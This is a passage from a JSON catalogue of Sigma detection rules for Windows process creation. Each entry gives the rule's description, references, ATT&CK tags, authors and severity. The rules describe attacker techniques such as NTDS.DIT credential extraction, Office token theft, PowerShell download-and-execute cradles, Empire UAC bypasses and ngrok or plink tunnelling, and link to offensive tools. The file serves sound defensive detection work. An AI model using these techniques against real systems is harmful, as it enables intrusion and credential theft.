"https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/", - "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html", - "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", - "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1007", - "attack.t1049", - "attack.t1018", - "attack.t1135", - "attack.t1201", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1087.001", - "attack.t1087.002", - "attack.lateral_movement", - "attack.t1021.002", - "attack.s0039" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_net_execution.yml", - "author": "Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)", - "level": "low", - "falsepositive": [ - "Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects net use command combo which executes files from WebDAV server; seen in malicious LNK files", - "uuid": "f0507c0f-a3a2-40f5-acc6-7f543c334993", - "value": "Suspicious Net Use Command Combo", - "meta": { - "refs": [ - "https://twitter.com/ShadowChasing1/status/1552595370961944576", - "https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/09/01", - "filename": "proc_creation_win_susp_net_use.yml", - "author": "pH-T", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a when net.exe is called with a password in the command line", - "uuid": "d4498716-1d52-438f-8084-4a603157d131", - "value": "Password Provided In Command Line Of Net.exe", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use_password_plaintext.yml" - ], - "tags": "No established tags", - "creation_date": "2021/12/09", - "filename": "proc_creation_win_susp_net_use_password_plaintext.yml", - "author": "Tim Shelton (HAWK.IO)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", - "uuid": "431a1fdb-4799-4f3b-91c3-a683b003fc49", - "value": "New Kernel Driver Via SC.EXE", - "meta": { - "refs": [ - "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_kernel_driver_via_sc.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/07/14", - "filename": "proc_creation_win_susp_new_kernel_driver_via_sc.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Rare legitimate installation of kernel drivers via sc.exe" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "uuid": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", - "value": "Suspicious New Service Creation", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/07/14", - "filename": "proc_creation_win_susp_new_service_creation.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", - "uuid": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", - "value": "Ngrok Usage", - "meta": { - "refs": [ - "https://ngrok.com/docs", - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", - "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", - "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection", - "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", - "https://twitter.com/xorJosh/status/1598646907802451969", - "https://www.softwaretestinghelp.com/how-to-use-ngrok/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572" - ], - "creation_date": "2021/05/14", - "filename": "proc_creation_win_susp_ngrok_pua.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "uuid": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", - "value": "Suspicious Nmap Execution", - "meta": { - "refs": [ - "https://nmap.org/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nmap.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ], - "creation_date": "2021/12/10", - "filename": "proc_creation_win_susp_nmap.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Network administrator computer" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", - "uuid": "c09dad97-1c78-4f71-b127-7edb2b8e491a", - "value": "Execution of Suspicious File Type Extension", - "meta": { - "refs": [ - "https://pentestlaboratories.com/2021/12/08/process-ghosting/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2021/12/09", - "filename": "proc_creation_win_susp_non_exe_image.yml", - "author": "Max Altgelt", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection", - "uuid": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", - "value": "Suspicious Ntdll Pipe Redirection", - "meta": { - "refs": [ - "https://www.x86matthew.com/view_post?id=ntdll_pipe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/03/05", - "filename": "proc_creation_win_susp_ntdll_type_redirect.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", - "uuid": "8bc64091-6875-4881-aaf9-7bd25b5dda08", - "value": "Suspicious Process Patterns NTDS.DIT Exfil", - "meta": { - "refs": [ - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", - "https://pentestlab.blog/tag/ntds-dit/", - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", - "https://github.com/zcgonvh/NTDSDumpEx", - "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", - "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], - "creation_date": "2022/03/11", - "filename": "proc_creation_win_susp_ntds.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", - "uuid": "a58353df-af43-4753-bad0-cd83ef35eef5", - "value": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], - "creation_date": "2022/09/14", - "filename": "proc_creation_win_susp_ntdsutil_usage.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate usage to restore snapshots", - "Legitimate admin activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "uuid": "bb76d96b-821c-47cf-944b-7ce377864492", - "value": "Suspicious NTLM Authentication on the Printer Spooler Service", - "meta": { - "refs": [ - "https://twitter.com/med0x2e/status/1520402518685200384", - "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" - ], - "creation_date": "2022/05/04", - "filename": "proc_creation_win_susp_ntlmrelay.yml", - "author": "Elastic (idea), Tobias Michalski", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "uuid": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", - "value": "Suspicious NT Resource Kit Auditpol Usage", - "meta": { - "refs": [ - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ], - "creation_date": "2021/12/18", - "filename": "proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml", - "author": "Nasreddine Bencherchali @nas_bench", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", - "uuid": "65d2be45-8600-4042-b4c0-577a1ff8a60e", - "value": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", - "https://twitter.com/Hexacorn/status/1187143326673330176", - "https://redcanary.com/blog/raspberry-robin/", - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.008" - ], - "creation_date": "2019/10/25", - "filename": "proc_creation_win_susp_odbcconf.yml", - "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate use of odbcconf.exe by legitimate user" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", - "uuid": "6d3a3952-6530-44a3-8554-cf17c116c615", - "value": "Suspicious Office Token Search Via CLI", - "meta": { - "refs": [ - "https://mrd0x.com/stealing-tokens-from-office-applications/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1528" - ], - "creation_date": "2022/10/25", - "filename": "proc_creation_win_susp_office_token_search.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate command-lines containing the string mentioned in the command-line" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The OpenWith.exe executes other binary", - "uuid": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "value": "OpenWith.exe Executes Specified Binary", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", - "https://twitter.com/harr0ey/status/991670870384021504", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_openwith.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2019/10/12", - "filename": "proc_creation_win_susp_openwith.yml", - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", - "level": "high", - "falsepositive": [ - "Legitimate use of OpenWith.exe by legitimate user" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects EnableUnsafeClientMailRules used for Script Execution from Outlook", - "uuid": "e212d415-0e93-435f-9e1a-f29005bb4723", - "value": "Suspicious Execution from Outlook", - "meta": { - "refs": [ - "https://github.com/sensepost/ruler", - "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" - ], - "creation_date": "2018/12/27", - "filename": "proc_creation_win_susp_outlook.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious program execution in Outlook temp folder", - "uuid": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", - "value": "Execution in Outlook Temp Folder", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], - "creation_date": "2019/10/01", - "filename": "proc_creation_win_susp_outlook_temp.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", - "uuid": "cbec226f-63d9-4eca-9f52-dfb6652f24df", - "value": "Suspicious Process Parents", - "meta": { - "refs": [ - "https://twitter.com/x86matthew/status/1505476263464607744?s=12", - "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml" - ], - "tags": "No established tags", - "creation_date": "2022/03/21", - "filename": "proc_creation_win_susp_parents.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", - "uuid": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", - "value": "Conhost Spawned By Suspicious Parent Process", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parent_of_conhost.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/09/28", - "filename": "proc_creation_win_susp_parent_of_conhost.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "uuid": "fca949cc-79ca-446e-8064-01aa7e52ece5", - "value": "PCHunter Usage", - "meta": { - "refs": [ - "http://www.xuetr.com/", - "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", - "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml" - ], - "tags": "No established tags", - "creation_date": "2022/10/10", - "filename": "proc_creation_win_susp_pchunter.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", - "uuid": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", - "value": "Code Execution via Pcwutl.dll", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", - "https://twitter.com/harr0ey/status/989617817849876488", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pcwutl.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2020/10/05", - "filename": "proc_creation_win_susp_pcwutl.yml", - "author": "Julia Fomina, oscd.community", - "level": "medium", - "falsepositive": [ - "Use of Program Compatibility Troubleshooter Helper" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "uuid": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", - "value": "Execute Code with Pester.bat", - "meta": { - "refs": [ - "https://twitter.com/Oddvarmoe/status/993383596244258816", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2020/10/08", - "filename": "proc_creation_win_susp_pester.yml", - "author": "Julia Fomina, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "uuid": "18988e1b-9087-4f8a-82fe-0414dce49878", - "value": "Execute Code with Pester.bat as Parent", - "meta": { - "refs": [ - "https://twitter.com/Oddvarmoe/status/993383596244258816", - "https://twitter.com/_st0pp3r_/status/1560072680887525378", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2022/08/20", - "filename": "proc_creation_win_susp_pester_parent.yml", - "author": "frack113, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", - "uuid": "54786ddc-5b8a-11ed-9b6a-0242ac120002", - "value": "Suspicious Ping And Del Combination", - "meta": { - "refs": [ - "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", - "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_del.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2022/11/03", - "filename": "proc_creation_win_susp_ping_del.yml", - "author": "Ilya Krestinichev", - "level": "high", - "falsepositive": [ - "False positive could occur in admin scripts that execute inline" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a ping command that uses a hex encoded IP address", - "uuid": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", - "value": "Ping Hex IP", - "meta": { - "refs": [ - "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna", - "https://twitter.com/vysecurity/status/977198418354491392", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1027" - ], - "creation_date": "2018/03/23", - "filename": "proc_creation_win_susp_ping_hex_ip.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "uuid": "48a61b29-389f-4032-b317-b30de6b95314", - "value": "Suspicious Plink Port Forwarding", - "meta": { - "refs": [ - "https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/", - "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" - ], - "creation_date": "2021/01/19", - "filename": "proc_creation_win_susp_plink_port_forward.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Administrative activity using a remote port forwarding to a local port" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Execution of plink to perform data exfiltration and tunneling", - "uuid": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", - "value": "Suspicious Plink Usage RDP Tunneling", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572" - ], - "creation_date": "2022/08/04", - "filename": "proc_creation_win_susp_plink_usage.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", - "uuid": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", - "value": "Suspicious Powercfg Execution To Change Lock Screen Timeout", - "meta": { - "refs": [ - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", - "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powercfg.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/11/18", - "filename": "proc_creation_win_susp_powercfg.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", - "uuid": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", - "value": "Suspicious PowerShell Encoded Command Patterns", - "meta": { - "refs": [ - "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/05/24", - "filename": "proc_creation_win_susp_powershell_cmd_patterns.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Other tools that work with encoded scripts in the command line instead of script files" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious ways to download files or content using PowerShell", - "uuid": "6e897651-f157-4d8f-aaeb-df8151488385", - "value": "PowerShell Web Download", - "meta": { - "refs": [ - "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml" - ], - "tags": "No established tags", - "creation_date": "2022/03/24", - "filename": "proc_creation_win_susp_powershell_download_cradles.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Scripts or tools that download files" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious ways to download files or content and execute them using PowerShell", - "uuid": "85b0b087-eddf-4a2b-b033-d771fa2b9775", - "value": "PowerShell Web Download and Execution", - "meta": { - "refs": [ - "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/03/24", - "filename": "proc_creation_win_susp_powershell_download_iex.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Scripts or tools that download files and execute them" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious powershell command line parameters used in Empire", - "uuid": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "value": "Empire PowerShell Launch Parameters", - "meta": { - "refs": [ - "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/04/20", - "filename": "proc_creation_win_susp_powershell_empire_launch.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Other tools that incidentally use the same command line parameters" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects some Empire PowerShell UAC bypass methods", - "uuid": "3268b746-88d8-4cd3-bffc-30077d02c787", - "value": "Empire PowerShell UAC Bypass", - "meta": { - "refs": [ - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_uac_bypass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" - ], - "creation_date": "2019/08/30", - "filename": "proc_creation_win_susp_powershell_empire_uac_bypass.yml", - "author": "Ecco", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Commandline to launch powershell with a base64 payload", - "uuid": "fb843269-508c-4b76-8b8d-88679db22ce7", - "value": "Suspicious Execution of Powershell with Base64", - "meta": { - "refs": [ - 